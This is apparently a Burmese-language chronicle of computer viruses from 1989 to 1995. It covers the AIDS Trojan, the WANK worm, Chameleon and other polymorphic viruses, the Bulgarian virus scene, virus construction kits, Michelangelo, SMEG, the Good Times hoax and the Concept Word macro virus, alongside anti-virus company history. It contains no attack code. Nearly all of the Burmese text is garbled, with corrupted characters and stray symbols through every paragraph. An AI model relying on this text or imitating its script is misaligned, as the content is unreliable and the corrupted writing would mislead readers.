၁၉၈၉"Vacsina" ၊ "Yankee" ��႔န�႔ ��ပN��စပါ��ထ� ဖစပါ.�႔ "Datacrime" န�႔ "FuManchu" ဆ��႔ Virus �သစပါအေတြ�တြထကာအေပၚလ�ခ�႔ပ#�ယဆ။ အေ��ကာ. ��ဘး� ၁၃ရာေကာအေန႔မ�� ဒ�ဇငးj� ၃၁ ရာေကာအေန႔�ထ� ပငး� ပငး�ထနတးျcန န�႔ �*rရာေ�ယဆF ကာ��မ��:စပါ� အေပ�ခ�႔��႔ ပ#�ယဆ။ ဒ� Virus ကာ hard disk မ��ကာ�� format ခ�ပစပါ"#�ယဆ။ သ�ၾကာ��ငး�ပ� hard disks ကာ�� format ခ�လ��အေကာ�� ရာေ��သအေမ��လ�အေတြ�ကာ�န ပ�အေပ# �... �စပါ��အေကာ�ငး��ကာ ��ဒ� Virus လည� format ခ�လ��ကာအေ�� အေပ��ကသြားျကာ8 ��ပ#ပ�...။ဒ#အေပမယဆ� သ%ရာေ�႕ ��ကာ��ကာ�;ကာ အေဟာ�9န န�႔ ဗ��နတးျ�� ရာေ��႔ media ��ပN�အေတြ�ကာ��အေ�� ရငတငးj,�N[f�� အေ��X+,စပါ9�,�႔ အေဒ#သပ�အေနတးျcစပါခ�႔ပ#�ယဆ..။၁၉၈၉ စပါကာ. ငတငးj�လ : အေန�ကာc ပ Anti-Virus program �စပါ��ထပသြပRကာ9 �ပ#�ယဆ...။ ��ဒ#အေကာ�� IBM Anti-Virus ပ#။၁၉၈၉ အေ��ကာ. ��ဘး�လ : DECNet မ�� အေန�ကာ. ခ# virus ကာ%�စပါကာ ပနတးျ"#�ယဆ။ ��ဒ� worm virus အေကာ�� "WANK Worm"

လ��အေ႔ခၚပ#�ယဆ။၁၉၈၉ ဒ�ဇငးj� : "AIDS" လ��အေ႔ခၚ��႔ "Trojan horse" �စပါ�� အေသ�ငး�ကာ�န � ပနတးျ"#�ယဆ။ "AIDS Information Diskette

Version 2.0" ဆ��႔ diskette �မ��E သ��အေပၚမ�� copy အေပ#ငး� ၂၀,၀၀၀ ပ��႔လy�"#�ယဆ။ 90 boot-ups ပ��႔�ခ#မ�� ဒ� "Trojan" program ကာ disk အေပၚမ� file name မ��လ6��ကာ�� encode လ�ပ"+စပါ9�,�ကာ ပ�� ဒ#အေတြ�ကာ�� မ မအေငးT��ငး အေဖ��ကာ"+စပါ9�,�ကာ"#�ယဆ။ ပ��အေ�� file �စပါ��ထ�သ�လ��ငး ဖ�9 ��႔အေရာေ��ပ#�ယဆ...��ဒ#အေကာ�� P.O Box 7, Panama ဆ��႔ လ�ပN��ငး� ၁၈၉ အေဒၚလ� ပ��အေ႔ပ�ဖ��႔�တြ�ကာ အေအေ:ငး��ငး�ခ6လy�ပ#။ ဒ� program အေရာေ��႔သ%ကာ�� ဖမ�ဆ�� ပ�� အေထ�ငးc�ကာ��

ပ��႔ခ�႔ၾကာပ#�ယဆ။၁၉၈၉ မ��ပ� ရ�ရာေ��*��ငးd6မ��လည� "Cascade", "Jerusalem", "Vienna" ��႔န�႔ �%ည��႔ computer virus မ�� စပါ�ငး"L႕ *�6႕ လ�ပ#�ယဆ။ ကာ6အေကာ�ငး�:စပါ�ပ� ရ�ရာေ�� programmer အေတြ�ကာ ��ဒ� Virus အေတြ�န�႔ �လ�+ပ9,�ပ"6�န�႔ principle အေတြ�ကာ�� လ��+ငး9��ငး မန မနတးျT��အေအေ:ဖတြ�႔ရာေ��တြသ�� ပ�� ခ�ကာ��ငး�ဆ��သလ��ပ� မ��:စပါ�အေသ� anti-virus အေတြ�န�႔ AVP ��႔ အေပၚတြထကာ9 �ခ�႔ပ#�ယဆ...။

၁၉၉.ဒ�*�အေစပါ�� ထငးT��အေကာ��Fကာ��႔ � ဖစပါEပ�ကာ��:စပါ�ကာ�� ယဆ%အေဆ�ငး9�ခ�႔ပ#�ယဆ..။ ပထမ � ဖစပါEပ�ကာ. စပါ��အေကာ�� ပထမဆ6�� ပ6�စပါ6မ�� A�စပါ6�ရ�ပအေ ပ�ငး�ရ� +ပ9y�လ�ပ*��ငတငး.�႔ "Chameleon" ( "V2P1", "V2P2" န�႔ "V2P6 လ��႔လည� လ%သ�မ��႔ ) Virus မ��တြထကာအေပၚလ�ခ�႔ပ#�ယဆ။ anti-virus program အေတြ�ကာ virus မ��ကာ�� ရာေ��အေ:ဖ*��ငးU��႔�တြ�ကာ "မ�ကာ*��ဖ6��မ��"( virus code

�ပ��ငး��စပါမ��) ကာ�� မသ6��ခငးEခ��နတးျc�အေ��ငး ပ#ပ�။ "Chameleon" မ�� အေပၚတြထကာ9 � ပ��႔ အေန�ကာ�� anti-virus program

developer မ��ဟာ� virus ကာ�� detect လ�ပ*��ငးU��႔�တြ�ကာ တြကာ� ပ�� ခ��န��႔ နည�လမ��မ��A�မ�� A�ကာ�� ရာေ��အေ:ဖခ�႔ၾကာရာေပ#�ယဆ...။ဒ��ယဆ � ဖစပါEပ�အေကာ� �� Bulgarian " virus production factory" အေပၚတြထကာ9 �ခ�႔ ခငး�ပ#။ Bulgarian ကာ �တြလန ႔�တြလနတးျ�� ပ��႔ virus �သစပါအေပ#ငး�အေ မ�ကာ��:စပါ�ကာ�� ဖနတးျ.��ခ�႔ပ#�ယဆ။ ဆ��ပသြရာေ��အေသ� အေ� ခအေ�နကာ�� ဖစပါအေပအေၚစပါ��႔ "Murphy", "Nomenclatura", "Beast"( [ သ��႔ ] "512", "Number-of-Beast") ��ပN�၀ငး virus မ�� န�႔ "Eddie" Virus မ��ကာ�� ပA ပပသြငး�န �မ6 ခငး� စပါသ ဖငး�အေသ� လ�ပdန �မ��ကာ�� ပAလ�ပ��႔ပ#�ယဆ။ အေသခ��စပါ��အေကာ�� Dark

Avenger( "Eddie") ဟာ� မ��:စပါ�အေသ� virus �သစပါ�� ပAလ�ပ ခငး�၊ system �တြ�ငး�တြ�ငး ကာ%�စပါကာ ခငး�*�ငး� track

မ��ကာ�� ဖ6��တြကာယဆ ခငး� ရာေ�႕ အေ� ခခ6 စပါည�စပါနကပစပါEသစပါ��ကာ�� ကာ��A�ရာေ�� :စပါ��သ6��ခ� ခငး��အေ႔ၾကာ�ငး� ပငး� ပငး�ထနတးျcန ထ�အေရာေ�ကာ9 �အေစပါပ#အေ��ယဆ။ ဒ# �� ပငး virus code မ��ကာ�� လ�လ�ယဆU��႔န�႔ viurs ပAလ�ငတပ8ငတOမ��တြ�ကာ inforamtion မ��ကာ�� လ�လ�ယဆU��႔ ပထမဆ6�� virus exchange (VX)BBS ကာ�� ဘး%အေဂ�ရာေ�ယဆ��မ�� :ဖငး�=9�စပါ��႔ပ#�ယဆ။၁၉၉၀ ဇ%လ��+ငး9ကပမ�� "PC Today" တြကာန ပ{��မဂ|ဇငး� ( Great Britain ) မ�� ဖစပါTငတပ.,စပါ�� ဖပသြစပါ"��ခ�႔ပ#�ယဆ။ ��ဒ#အေကာ�� ၄ငး�မဂ|ဇငး�ရာေ�႕ floppy disk �စပါ��မ�� " DiskKiller" virus ပ#၀ငးအေန�� ဖစပါ"#�ယဆ။ copy အေပ#ငး� ၅၀,၀၀၀ အေကာ��,� အေရာေ�ငး�ခ�ခ�႔ပ#�ယဆ။၁၉၉၀ခ�*�ငတစပါEလယဆ"��ငး� မ��အေ�� "Frodo" န�႔ "Whale" လ��အေ႔ခၚ��႔ အေၾကာ�ကာNရာေ�သ�W၀#*�စပါအေကာ�ငး အေပၚလ� ပနတးျ"#�ယဆ။ ��ဒ� virus *�စပါ��စပါလ6��ကာ အေသသပ"�ရာေ� ပ�� အေ ခလ6�လကာ9 6�ရာေ��လ��႔ �စပါ��E ပ��ငး�အေပ#ငး�မ��:စပါ� အေပ#ငး�စပါပ"#၀ငးအေန��႔ စပါည�စပါနစပါ��ကာ�� ပငး� ပငး�ထနတးျcန �ကာ��A�ရာေ��ရာေ�� သ6��ခ�ခ�႔ၾကာပ#�ယဆ။ ��ဒ�နည�စပါနစပါအေတြ�ထ�မ��မ� ထ�ပ.န �ကာ��အေကာ�� 9KB "Whale" မ�� လ�A�႕ ၀�ကာ code �ဆငး�အေပ#ငး�မ��:စပါ�န�႔ တြကာန ပ{��ရာေ�႕ � ပစပါEန��ဆ�ကာ�� ရာေ��အေ:ဖအေမတြ�႔*��ငးအေစပါ��႔ နည�ပည�မ��ကာ�� သ6�� ပAခ�႔ပ#�ယဆ။

၁၉၉၁Computer virus အေ�ရာေ�တြ�ကာX � ဆကာ9 ကာ. ��:ပ��အေနဆ� ဖစပါ ပ�� ယဆခ��ခ��နတးျ�� ရာေ�အေပ#ငး�မ��:စပါ� ရာေ��အေနပ# ပ�။ Anti-virus အေတြ�ရာေ�႕ သကာ၀ငး9;ပT��မ;အေတြ�ကာလည� ��ကာ�;ကာ�� ပအေသနပ#�ယဆ...။ �ခ��နတးျc�ကပမ��ပ� Software ၾကာ��*�စပါ�� ဖစပါ.�႔ Symantec

န�႔ Central Point ��႔ကာ သ%��႔ ကာ��ယဆ"��ငး anti-virus program မ�� ဖစပါFကာ�� Norton Anti-virus န�႔ Central Point

Anti-virus ��႔ကာ�� ထ��9 �ပ��႔ပ#�ယဆ။ ��ဒ� anti-virus အေတြ�ကာ လ%သ�မမ��အေသ� anti-virus မ�� ဖစပါFကာ��႔ Xtree န�႔ Fifth

Generation ��႔ ��ငး� လ��ကာ9 �ပ��႔�� ဖစပါ"#�ယဆ။ဧျ ပ�လမ��အေ�� ပည�+E၀ �ဖ�ကရြကာNမ��ရာေ��႔ file န�႔ boot polymorphic virus တြထကာ9 � ပ�� "Tequila" လ��အေ႔ခၚပ#�ယဆ။ ဒ#� ပငး စပါကာ. ငတငးj�လမ��လည� ��ဒ�လ�� virus �မ��A��စပါ��စပါ�� ဖစပါ.�႔ "Amoeba" virus တြထကာ9 �ပ#�ယဆ။၁၉၉၁ ရာေ�႕ အေ*:ရာေ�သ�မ�� file မ��ကာ�� ကာ%�စပါကာ. �႔ အေ� ခခ6အေသဘး��ရာေ��အေတြ�ကာ�� သ6�� ပAထ��အေသ� link virus �ခ� ဖစပါ.�႔ "Dir_II" အေပၚတြထကာ9 �ခ�႔ပ#�ယဆ။

၁၉၉၂Non-IBM PC န�႔ Non-Dos virus မ��အေကာ�� လ6��၀န��ပ#�အေမ�အေအေနလ�ကာအေ��ငး��ငတ� ထပ�တြထကာ9 �ခ��ပ#ဘး%�... ဘး�အေၾကာ�ငး�=9�ဆ��အေ�� global access network ရာေ�႕ "holes" မ��ကာ�� ပ��9 ��ကာ ခငး�၊ errors မ��ကာ��အေ ဖရာေ�ငး�လ��ကာ ခငး�န�႔ network

worm virus မ�� သ%��႔ကာ��ယဆ. ��ငး ပန *�6႕ *��ငတငး.�႔ :စပါမ�ရာေ[~�� ဆ6��ရာေ;6�တြသ�� ခငး��႔ အေၾကာ�ငး� ဖစပါ"#�ယဆ။ ပ�� ပ�� ပ�� အေ�ရာေ�ၾကာ��လ�အေသ� လ%သ6��မ��ဆ6�� computer model (IBM PC) မ� operation system (MS-DOS)မ��ပ� File,

boot န�႔ file-boot virus မ�� ကာ�ယဆ� �ယဆ ပန ႔ ပန ႔ ကာ%�စပါကာ��႔ပ#�ယဆ။ virus program အေ�ရာေ�တြ�ကာ�� ကာအေနသလ�� virus ��ကာ��ကာ�6ရာေမ;အေတြ�ကာလည� အေန႔စပါဥးS�႔ �မ�� ဖပသြစပါ"��အေနခ�႔ပ#�ယဆ။ virus အေတြ� ��:ပ��အေနသလ�� မ��A�မ�� A�အေ�တြထအေ�အေတြထသ� anti-virus program မ��ကာလည� :ဖ6႕ ဖ�A�အေနခ�႔ ပ�� anti-virus ဆ��ငးT�စပါ��ပ��၊ လစပါဥးc�ပN�အေစပါ�ငး မဂ|ဇငး�မ��လည� �မ�� ပ��ရ��ကာ*��ငတပcငတ��အေ၀ခ�႔ၾကာပ#�ယဆ။၁၉၉၁ �စပါပ��ငး�မ�� လ6�� သ%႔လ��လ��ကာ9 �ပ��႔ရာေ��႔ မ��:စပါ�အေသ� polymorphic virus မ��တြ�ကာ အေ� ခခ6�စပါ�� ဖစပါခ�႔��႔ ပထမဆ6�� polymorphic generator MtE အေပၚတြထကာ9 �ပ#�ယဆ။ MtE ဟာ� အေန�ကာ"��ငး�အေပၚတြထကာ9 �မည� polymorphic generator �ခ��A႕�တြ�ကာ အေရာေ�အေ႕ ပ�ပ6�စပါ6�စပါ��လည� ဖစပါ��႔ပ#�ယဆ။၁၉၉၂ မ�9 မ�� "Michelangelo" ကာ%�စပါကာ virus ( "March6" လ��႔လည� လ%သ�မ��ပ#�ယဆ) န�႔ ��% စပါ�အေ�� ယဆ�ငးအေခ��ကာ�� ဖစပါNရာေ� မ��လည� လ��ကာ"#လ�ခ�႔ၾကာပ#�ယဆ။ ဖစပါ*��အေငး�� anti-virus company မ��ကာ user အေတြ�ဟာ� ဒ� virus ရာေ�႕ �*rရာေ�ယဆ� �� ကာ�တြကာယဆ*��ငး�� မဟာ��j O�ဆ�� ပ�� အေရာေ�ၾကာ��:ခ+ငး��,ယဆ9�ပ��႔ၾကာ��႔ �တြ�ကာ လ%သ�မ��႔ ဖစပါTငတပ.,စပါ�� ဖစပါ9�ခ�႔ဟာနတးျ.ငတOပ#�ယဆ။ ဒ#အေပမယဆ� သ%��႔ရာေ�႕ ထ��9 �ပ�;အေတြ�ကာ��အေ�� ဖြစပါ�အေဆ�ငး*��ငးအေစပါခ�႔ ပ�� ကာ��A�� မ�� ရာေရာေ��ဖ��႔ဖနတးျ.��ခ�႔ၾကာပ#�ယဆ။ အေ�မရာေ�ကာန aniti-virus ကာ�မၸာဏ��စပါ��ကာ အေၾကာ ငး�ခ�႔��႔ သ�ငး��ခ�ကာE လကာအေတြ�ထ�မ��အေ�� ဒ� Virus အေၾကာ�ငး� ၅ မ�လ�ယဆ6 န�႔�ထကာ တြကာန ပ{��အေတြ� ပ�ကာN��လ�မ��ယဆ9 ��႔ ဆ��ခ�႔ပ#�ယဆ...��ဒ�အေရာေ�ၾကာ��:ခ+ငး��,ယဆ9�ပ��႔��႔ အေၾကာ ငး�ခ�ကာအေၾကာ�ငး� � ခ�� anti-virus ကာ�မၸာဏ�မ��ကာ�� အေကာ��9y��ခ�နတးျ"Lကာ� �ကာ��A�� မ��ရာေရာေ��ခ�႔ပ#�ယဆ။ �မ�+နတးျ.ကာယဆ��အေ�� တြကာန ပ{�� ၁၀,၀၀၀ ခန အေ႔လ�ကာ8 � ထ�ခ��ကာ"�ကာN��ခ�႔�� ဖစပါ"#�ယဆ။၁၉၉၂ ဇ%လ��ငး မ�� VCL(Virus Ceation Laboratory) န�႔ PS-MPC ��႔ကာ ပထမဆ6�� virus ဖနတးျ.��အေသ� kit မ��ကာ�� ပAလ�ပ��႔ပ#�ယဆ။ သ%��႔ကာ �ၾကာ��စပါ�� virus �သစပါ��ကာ�� မငး�+(6�� flow မ��န�႔ ပAလ�ပ*��+ငးFကာပ#�ယဆ။ ဒ# �� ပငး virus ပAလ�ငတပ8ငတOမ��ကာ�� လည� � ခ�� ပ�� ပ��:စပါမ��ရာေ��႔ virus မ�� ပAလ�ပU��႔န�႔ virus ဖနတးျ.��႔ kit အေတြ� ပAလ�ပU��႔ လ;6အေ႕ဆ�အေပ�ခ�႔ပ#�ယဆ။၁၉၉၂ �ဆ6��ပ��ငး�မ��အေ�� OS ရာေ�႕ executable မ��ကာ�� ကာ%�စပါကာ. �႔ ပထမဆ6�� Windows virus မ��အေပၚတြထကာ9 � ပ�� virus ပAလ�ပ ခငး�ရာေ�႕ စပါ�မ�ကာS��သစပါ��ငတ� စပါ�ပသြငးUငး�=9�စပါ��႔ပ#�ယဆ။

၁၉၉၃

http://www.f-secure.com/v-descs/vcl.shtml

http://www.f-secure.com/v-descs/michel.shtml

http://www.f-secure.com/v-descs/tequila.shtml

virus ��တြထ+ငး8ငတOအေတြ�ကာ ဖ�ကာ( ��မ;��ပ��အေကာ�ငး��႔ virus အေတြ�ကာ��ထ��9 �+ပFကာ ပ�� ဘးကာ� လည� �ရငတငး.ငတ�န �ကာထကာ8 �ငတပcငတO� ခ��မ; မရာေ��႔ virus ရာေ�အေပ#ငး�မ��:စပါ�တြထကာအေပၚလ�ခ�႔ပ#�ယဆ။ ဒ# �� ပငး �တြသ+ငးEမ�� A�မ�� A�သ��အေ႔ ပ�ငး�လ� ကာ%�စပါကာ*��ငတငး.�႔ virus အေတြ�န�႔ ၄ငး��႔�တြ�ကာ ကာရာေ�ယဆ��နတးျ(�ပလ� software အေတြ� ပ��အေ�� သစပါcငတပသြပRကာ9 ��႔ electornic ပစပါၥည�အေတြ��တြ�ကာ �ရငတငး�နည�လမ�အေတြ�ကာ�� ပA ပငးc��႔ virus အေပ#ငး� အေ မ�ကာ မ��:စပါ�တြထကာအေပၚလ�ပ#�ယဆ။ ဥးပမ�....

"Steath boot PMBS" - ၄ငး�ဟာ� �စပါ�Oထ%� ခ��႔ �လ�+ပ9,�ပ�;ပ6�စပါ6န�႔ ဖစပါ"#�ယဆ။ ၄ငး�ကာ virus ကာ%�စပါကာc ��႔ floppy

disk အေကာနတးျKပ�� ၀ငး"#�ယဆ။ Steath_Boot ကာ�� install �စပါ�#လ�+ပ9�,�ကာ��ရာေငး ၄ငး�ကာ သ%႔ဟာ�သ% extended memory ထ�မ�� install

လ�ပ"#�ယဆ။ ပ��အေ�� computer ကာ�� protected mode သ��႔ switch လ�+ပ9�,�ကာ"#�ယဆ။ ��ဒ�အေန�ကာ DOS န�႔ program အေတြ��သ6�� ပAမ�� ဖစပါ.�႔ virtual V86 machine �စပါ��ကာ�� run လ��ကာ"#�ယဆ။ အေ� ခခ6�� ဖငး�အေ�� ဒ� virus ကာ operation

system န�႔ �hardware ၾကာ��ထ�မ�� လ�+ပ9�ငတပ.� ဖစပါ"#�ယဆ။"Strange" (သ��႔) "Hmm" - ၄ငး�အေကာ�� Stealth technology ရာေ�႕ "masterpiece" �စပါ�� ဖစပါ"#�ယဆ။ INT 0Dh န�႔ INT

76h ၾကာ�� hardware level အေတြ�မ��အေ�� အေကာ�ငး�အေကာ�ငး��လ�+ပ9,�ပ"#�ယဆ။"Shadowgard" ၊ "Carbunkle" - ၄ငး��႔အေကာ�� ခ��အေ�ဖ� virus အေတြ�ကာ�� စပါနကပစပါ.ကာ� န�႔ �လ�ပအေကာ�ငး�အေကာ�ငး�လ�ပ*��dအေ��ငး ပAလ�ပအေပ�ပ#�ယဆ။"Emmie", "Metallica", "Bomber", "Uruguay", "Cruncher" - ၄ငး��႔အေကာ�� ကာ%�စပါကာ. �႔ file အေတြ�ထ�မ�� ၄ငး��႔ရာေ�႕

ကာ��ယဆ"��ငး code အေတြ�ကာ�� အေဖ��ကာc ��႔ အေ� ခခ6နည�လမ�သစပါအေတြ�ကာ�� သ6��ထ�� ဖစပါ"#�ယဆ။၁၉၉၃ ရာေ�႕ အေ*:ဥး�ရာေ�သ�မ��အေ�� Microsoft အေကာနတးျKပ�� Central Point �� ဖငး� CPAV အေပၚမ��အေ� ခခ6ထ��႔ ၄ငး��႔ရာေ�႕ ကာ��ယဆ"��ငး Anit-Virus "MSAV" ကာ�� ပAလ�ပ��႔ပ#�ယဆ။

၁၉၉၄၁၉၉၄ ကာ�� အေရာေ�ကာ9 ��ခ#မ��အေ�� CD virus အေတြ�ရာေ�႕ ပ�န�ကာ ပ�� ပ�� အေ�ရာေ�ၾကာ��လ�ခ�႔ပ#�ယဆ။ ဒ� Virus အေတြ� ပန *�6႕ ခ�႔ရျZခငး�ရာေ�႕ �ဓ�ကာအေ�ၾကာ�ငး��ရာေငး�အေကာ�� CD disk အေတြ� လ%သ6��မ��လ�လ��႔ပ� ဖစပါ"#�ယဆ။ � ပ�AငးSကာ. ည� CD မ��ကာ�� preparing လ�ငတပ.�႔�ခ#မ�� master disk အေတြ�ဟာ� virus အေတြ�ကာ�� ရာေရာေ�� တြသ��ၾကာပ#�ယဆ။ ��ဒ��တြ�ကာE ကာ��A�ရာေလအေဒ�� အေ��အေ��အေလ�မ�� ပ��လ��႔ အေ�ရာေ�တြ�ကာ ( ၁ အေသ�ငး� အေလ�ကာအေသ� ) virus ကာ%�စပါကာအေန��႔ CD မ�� အေစပါ��တြကာကာc �ကာ��အေရာေ�ကသြားျကာ8 �� ခငး�ပ#ပ�။ အေသခ��စပါ��အေကာ�� ဒ� Virus ကာ�� သ%��႔ အေမ ဖရာေ�ငး�*��ငး��႔ၾကာပ#ဘး%�...ဒ#အေၾကာ�ငး� CD အေတြ�ကာ��ဖ�ကာ( ��ခ�႔ၾကာရာေပ#�ယဆ။ဒ�*�စပါT�႕ အေ�စပါ�ပ��ငး�မ��ပ� ဗ��န *��ငးd6မ�� 'SMEG.Pathogen" န�႔ "SMEG.Queeg" ဆ��႔ ပငး�ထန ပ��ရာေ;ပအေတြထ�လ��႔

polymorphic virus အေအေတြ�ခ�N��ခ�႔ပ#�ယဆ။ ၄ငး� virus အေတြ�ကာ�� ယဆခ�အေခ�. ��ငးအေ��ငး anti-virus program အေတြ��လ6�� ၁၀၀% ပည��+နတးျ�န အေ��ငး detection လ�ပ*��ငးအေသ�ပ#ဘး%�။ ၄ငး� virus ရာေ�႕ ဖနတးျ.��သ%ဟာ� virus ကာ%�စပါကာ. �႔ဖ��ငးအေတြ�ကာ�� BBS �စပါ��ဆ�မ�� ထည�+c��ပ#�ယဆ။ ဒ#အေတြ�ဟာ� media �သ��ငး��၀��ငး�ၾကာ��မ�� ကာယဆ"� အေၾကာ�ကရြကာT6႕ ထ��9 န ႕ ပ%ပငးအေစပါခ�႔��႔ ပ�န��စပါ�� ဖစပါ��႔ပ#�ယဆ။� ခ��ထ��9 န ႔:ဖယဆ ဂယဆကာ. စပါ��အေကာ�� "GoodTimes" ဆ��႔ virus ကာ��အေထ�ကာ"6vအေပ��႔ message �စပါ��အေကာန ဖနတးျ.��ခ�႔�� ဖစပါ"#�ယဆ။ ၄ငး� virus ကာ internet အေကာန�ဆငး� computer မ��ဆ�ကာ�� ၄ငး�ပ#��႔ E-mail ကာ��ရာေရာေ��႔�ခ��နတးျ�� ကာ%�စပါကာ"#�ယဆ။"GoodTimes" လ��မ�� A� virus အေတြ��မ�+နတးျ.ကာယဆ ပ#လ��အေ��မဟာ��"#ဘး%� ဒ#အေပမယဆ� အေန�ကာ"��ငး�မ��အေ�� "Good

http://www.f-secure.com/v-descs/ste_boot.shtml

Times" text string အေတြ� ပ#၀ငး.�႔ DOS virus အေ��တြထကာအေပၚလ�ပ#�ယဆ။ ၄ငး�ကာ�� "GT-Spoof" လ��အေ႔ခၚပ#�ယဆ။ဥးအေပဒKပ႒ာ�န �ခ�ကာ��ကာ�� ကာE �ည ပA ပ��အေ႔န�ကာ ၁၉၉၄ ရာေ�႕ အေ*:ရာေ�သ�မ��အေ�� SMEG virus ��တြထငး��႔သ%ကာ�� ဖမ�ဆ��ခ�႔ပ#�ယဆ။ �ခ��နတးျ.ငတည�မ��ပ� ARCV(Association of Really Cruel Viruses) လ��အေ႔ခၚ��႔ virus ပAလ�ငတပ.�႔ ��ပN��စပါ��ငတ�လည� ဖမ�ဆ��မ;အေတြ� ပAလ�ပ��႔ပ#�ယဆ။ ��ဒ�အေန�ကာ �ခ��နတးျEနည�ငးယဆF ကာ� ပ��အေ႔န�ကာ�� virus မ��ကာ�� ပAလ�ပ��႔ virus ဖနတးျ.��သ%အေန�ကာ. စပါအေယဆ�ကာ အေန�အေ၀� မ�� ဖမ�ဆ��ခ�႔ပ#�ယဆ။ဒ�*�စပါ"��ငး�မ��ပ� ပ6�မ�နတးျ�ဟာ��. �႔ virus �သစပါ.ခ��A႕႕တြထကာအေပၚလ� ပနတးျ"#�ယဆ။ ��ဒ#အေတြ�အေကာ��...ဇနတးျS၀#ရာေ� ၁၉၉၄ : "Shifter" လ��အေ႔ခၚ��႔ object modules(OBJ files) မ��ကာ��ကာ%�စပါကာ. �႔ ပထမဆ6�� virus န�႔ အေမ�Nကာ�� မA�႕ မ�� polymorphic virus အေၾကာ�ငး� ပထမဆ6��ထ��. လန ႔ ဖစပါအေစပါခ�႔��႔ "Phantom1" ၊ဧျ ပ� ၁၉၉၄ : program source code ( C န�႔ Pascal) ��႔ကာ�� ကာ%�စပါကာ. �႔ virus ��ပN�၀ငး ဖစပါ.�႔ "SrcVir" ၊ဂတြqန ၁၉၉၄ : ရ�ရာေ��*��ငးd6မ�� အေ�ကာ��Fကာ��ဆ6�� virus �စပါ�� ဖစပါ��႔��႔ "OneHalf" ၊စပါကာ. ငတငးj� ၁၉၉၄ : boot-file မ��ကာ�� ကာ%�စပါကာ. �႔ virus "3AP3A" ၊ ၄ငး� virus ဟာ� MS-DOS ထ�ကာ�� ထည�:+8ငး��ခ# ပ6�မ�နတးျ�ဟာ��႔ မငး��႔ နည�လမ�အေတြ�ကာ�� သ6�� ပAထ��ပ#�ယဆ။ ဒ#အေၾကာ�ငး� anti-virus အေတြ�ဟာ� ဒ� virus န�အေ႔တြ�႔ဆ6�ဖ��႔�ဆငး�+8ငး��Zဖစပါ�႔� ၾကာပ#ဘး%�။၁၉၉၄ ရာေ�႕ အေ*:ဥး�ရာေ�သ�မ��အေ�� ဒ��ခ��နတးျ��လ��န �ကာ anti-virus အေတြ�ကာ��ဥး�အေဆ�ငးအေန��႔ ကာ�မၸာဏ��စပါ�� ဖစပါ.�႔

Central Point ရာေပN�ခ�႔ပ#�ယဆ။ ဒ#အေၾကာ�ငး�=9�ဆ��အေ�� ဒ��ခ��န anit-virus ကာ�မၸာဏ�အေလ�မ�� ဖစပါFကာ��႔ Peter Norton

Computing ၊ Cetus International န�႔ Fifth Generation Systems စပါ��႔ ကာ�မၸာဏ�အေလ�အေတြ�ကာ�� Symantec

လကာ၀#�ၾကာ��ပ��႔��႔� ပငး Central Point ကာ��လည� ၀ယဆ� Oလ��ကာ ခငး�အေၾကာ�ငး� ဖစပါ"#�ယဆ။

၁၉၉၅ဒ�*�စပါ"��ငး�မ��အေ�� DOS virus အေတြ�ၾကာ��မ�� သ�ပcငတO�ထ%� ခ�� ခ��မရာေ��ခ�႔ပ#ဘး%�။ သ��အေ႔သ�9,ည� �တြလနတးျT;ပအေတြထ��႔ virus မ�� ဖစပါ.�႔ "NightFall", "Nostardamus", "Nutcracker" န�႔ funny virus မ�� ဖစပါ.�႔ "bisexual" virus,"RMNS"

န�႔ BAT virus "Winstart" ��အေ႔ပအေၚပ#ကာ��႔ပ#�ယဆ။ ဒ# �� ပငး "ByWay" န�႔ "DieHard2" viurs မ��လည� ကာ�ယဆ� �ယဆ ပန ႔ ပန ႔ ပန *�6႕ ခ�႔ ပ�� ကာမ�ၻ�ပသြစပါ�ငး"L*�6ခ�႔��႔ သ�ငး�အေတြ�တြထကာအေပၚခ�႔ပ#�ယဆ။၁၉၉၅ အေအေဖဖ�၀#ရာေ�မ��အေ�� Microsoft မ�� ဖစပါTငတပ.,စပါ�� ဖပသြစပါ"��ခ�႔ပ#�ယဆ။ ��ဒ#အေကာ�� Windows95 demo disk အေတြ�မ�� "Form" ကာ%�စပါကာအေနတးျKခငး�ပ#ပ� ။ Microsoft အေကာနတးျKပ�� ၄ငး�ရာေ�႕ copy disk အေတြ�ကာ�� beta စပါမ�သပ8ငတOမ��ဆ�ကာ��ပ��႔ခ�႔ပ#�ယဆ...��ဒ�မ�� စပါအေယဆ�ကာအေသ� စပါမ�သပ8ငတOကာ �လ�ပ�ရာေ��လ�ပT�� ပ�� disk အေတြ�ကာ�� virus �တြ�ကာ စပါမ�သပ��႔လ��႔ ဖစပါ"#�ယဆ။၁၉၉၅ အေ*:ဥး�အေပ#ကာ��အေ�� anti-virus ကာ�မၸာဏ�*�စပါ�� ဖစပါ.�႔ ESaSS( ThunderBYTE anti-virus) န�႔ Data Defense

(Norman Virus Control) ��႔ကာ ၄ငး��႔ ပ%�အေပ#ငး�အေၾကာ�ငး� အေၾကာ ငး�ခ�႔ပ#�ယဆ။ ၄ငး� ကာ�မၸာဏ�အေတြ�ကာ anti-

virus အေတြ�န�႔ ပ�8 �Tငး သ�� ခ�� ရငတပ.ငတည*��ငတငး.�႔ :စပါမ�ရာေ[m��ၾကာ��႔ ကာ�မၸာဏ�အေတြ� ဖစပါ"#�ယဆ။ သ��အေ႔သ�9,ည� သ%��႔ကာ ��%ပ%�အေပ#ငး� ၾကာ�A�စပါ��ထ��;ခ�႔ၾကာ ပ�� အေပ#ငး�စပါပc��႔ anti-virus system �စပါ��ကာ�� စပါ�ငးEလ�+ပ9,�ပအေစပါခ�႔ပ#�ယဆ။၁၉၉၅ ၾသဂ�� : ဒ�လဟာ� virus န�႔ anti-virus �တြ�ကာ သမ��ငး��ခ��A��ဆစပါ �ခ� ဖစပါ��႔ရာေပ#�ယဆ။ ဘး�အေၾကာ�ငး�=9�ဆ��အေ�� Microsoft Word ("Concept") �တြ�ကာ ပထမဆ6�� virus "alive" တြထကာအေပၚလ�ခ�႔လ��႔ပ#ပ�။ ��ဒ� virus ကာ လ�နည�ငး

http://www.f-secure.com/v-descs/concept.shtml

ယဆE တြ�ငး�မ��ပ� ကာမ�ၻ�၀�မ�ကာ�� အေ ခဆန ႔ခ�႔ ပ�� MS word user အေတြ�ရာေ�႕ Computer အေတြ�ကာ��ဖ�ကာ( ��ခ�႔��႔ � ပငး �မ��A��မ��A�အေသ� computer အေခ#ငး�စပါ��အေတြ�ကာ�� ကာ��+ငး9;ပ��႔��႔ ပထမဆ6�� virus ဖစပါ9�ခ��ပ#�ယဆ။

